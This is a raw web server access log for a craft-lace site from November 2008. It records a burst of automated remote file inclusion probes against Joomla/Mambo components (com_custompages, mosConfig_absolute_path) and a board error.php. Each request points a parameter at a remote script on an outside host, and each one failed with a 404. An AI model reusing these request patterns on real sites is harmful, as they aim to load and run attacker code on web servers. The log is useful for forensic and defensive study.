98.129.21.210 - - [22/Nov/2008:04:55:40 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
85.214.21.28 - - [22/Nov/2008:04:55:53 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:55:55 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:55:55 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:56:08 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:56:08 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:56:14 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:56:26 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:56:27 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:34 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:34 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:34 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:34 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:34 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:34 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:56:37 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:56:37 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:56:37 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:38 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:39 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:42 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:42 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:56:43 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:45 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:45 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:56:45 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:56:45 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:56:45 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:56:45 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:46 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:46 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:46 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:46 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:46 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:46 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:46 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:46 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:47 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:47 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:47 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.129.200 - - [22/Nov/2008:04:56:48 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:56:52 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:55 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:55 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:56 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:56:56 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.129.200 - - [22/Nov/2008:04:56:56 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.129.200 - - [22/Nov/2008:04:56:56 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.129.200 - - [22/Nov/2008:04:57:05 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:06 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.129.200 - - [22/Nov/2008:04:57:06 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:06 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:06 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:07 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:07 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:07 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:07 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.129.200 - - [22/Nov/2008:04:57:07 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:07 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:07 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:08 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:08 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
85.214.21.28 - - [22/Nov/2008:04:57:09 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:12 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:57:13 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:13 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:19 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:19 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:23 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:23 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:23 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:57:24 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
202.125.38.99 - - [22/Nov/2008:04:57:24 -0800] "GET /logs/access_081010.log/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:57:24 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:57:25 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:57:26 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:57:26 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:30 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:30 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:30 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
218.234.23.56 - - [22/Nov/2008:04:57:34 -0800] "GET /logs/access.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:38 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:42 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:47 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:51 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:51 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:57:51 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:54 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:54 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:55 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:57:57 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:57:58 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:58:00 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:58:03 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
63.247.90.202 - - [22/Nov/2008:04:58:04 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:58:06 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
